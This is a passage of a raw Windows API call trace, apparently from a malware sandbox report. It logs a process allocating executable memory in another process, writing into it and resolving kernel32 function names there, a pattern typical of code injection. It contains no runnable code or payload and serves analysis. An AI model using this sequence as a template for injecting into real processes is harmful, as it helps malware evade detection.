bAlertable=0) returned 0x0 [0176.279] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0176.279] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.280] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.280] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.280] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.280] lstrlenA (lpString="GetLastError") returned 12 [0176.280] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.280] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9bdc*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9bdc*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.282] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.282] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.282] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.283] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.284] ResetEvent (hEvent=0x580) returned 1 [0176.284] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.284] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.284] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.284] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.284] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.285] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.285] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.285] lstrlenA (lpString="HeapFree") returned 8 [0176.285] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.285] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9bec*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9bec*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.287] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.287] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.287] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cd50*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cd50*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.288] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.288] ResetEvent (hEvent=0x580) returned 1 [0176.288] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.288] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.288] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.289] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.289] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.289] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.289] lstrlenA (lpString="HeapSize") returned 8 [0176.289] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.289] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9bf8*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9bf8*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.291] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.291] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.291] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c510*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c510*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.291] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.292] ResetEvent (hEvent=0x580) returned 1 [0176.292] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.292] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.292] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.293] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.293] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.293] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.293] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.293] lstrlenA (lpString="HeapReAlloc") returned 11 [0176.293] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.293] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c04*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c04*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.295] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.295] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c720 [0176.295] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.295] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c720*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c720*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.295] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.296] ResetEvent (hEvent=0x580) returned 1 [0176.296] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.296] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.296] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.296] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c720 | out: hHeap=0x2150000) returned 1 [0176.296] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.297] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.297] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.297] lstrlenA (lpString="HeapAlloc") returned 9 [0176.297] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.297] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c12*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c12*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0176.299] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.299] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.299] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.299] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.300] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.300] ResetEvent (hEvent=0x580) returned 1 [0176.300] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.300] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.300] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.301] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.301] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.301] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.322] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.322] lstrlenA (lpString="GetProcessHeap") returned 14 [0176.322] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.322] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c1e*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c1e*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.324] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.324] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.324] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.325] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c9c0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.325] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.326] ResetEvent (hEvent=0x580) returned 1 [0176.326] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.327] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.327] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.327] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.329] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.329] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.329] lstrlenA (lpString="lstrlenA") returned 8 [0176.329] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.329] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c30*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c30*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.331] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.331] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.331] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.331] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.332] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.332] ResetEvent (hEvent=0x580) returned 1 [0176.332] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.332] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.333] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.334] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.334] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.334] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.335] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.335] lstrlenA (lpString="lstrcpyA") returned 8 [0176.335] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.335] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c3c*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c3c*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.336] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.336] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.336] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.336] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.337] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.337] ResetEvent (hEvent=0x580) returned 1 [0176.337] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.338] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.338] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.338] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.338] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.338] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.338] lstrlenA (lpString="EnterCriticalSection") returned 20 [0176.338] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.339] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c48*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c48*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0176.340] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.340] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.340] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.340] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cde0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cde0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.341] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.341] ResetEvent (hEvent=0x580) returned 1 [0176.341] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.341] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.342] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.342] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.342] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.342] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.342] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.342] lstrlenA (lpString="LeaveCriticalSection") returned 20 [0176.342] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.342] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c60*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c60*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0176.345] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.345] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c720 [0176.345] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.345] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c720*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c720*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.345] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.346] ResetEvent (hEvent=0x580) returned 1 [0176.346] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.346] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.346] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c720 | out: hHeap=0x2150000) returned 1 [0176.346] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.347] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.347] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.347] lstrlenA (lpString="InitializeCriticalSection") returned 25 [0176.347] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.347] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9c78*, nSize=0x1a, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9c78*, lpNumberOfBytesWritten=0xcd978*=0x1a) returned 1 [0176.349] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.349] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0176.349] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.349] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cbd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cbd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.350] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.350] ResetEvent (hEvent=0x580) returned 1 [0176.350] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.350] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.350] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.351] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0176.351] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.351] GetModuleHandleW 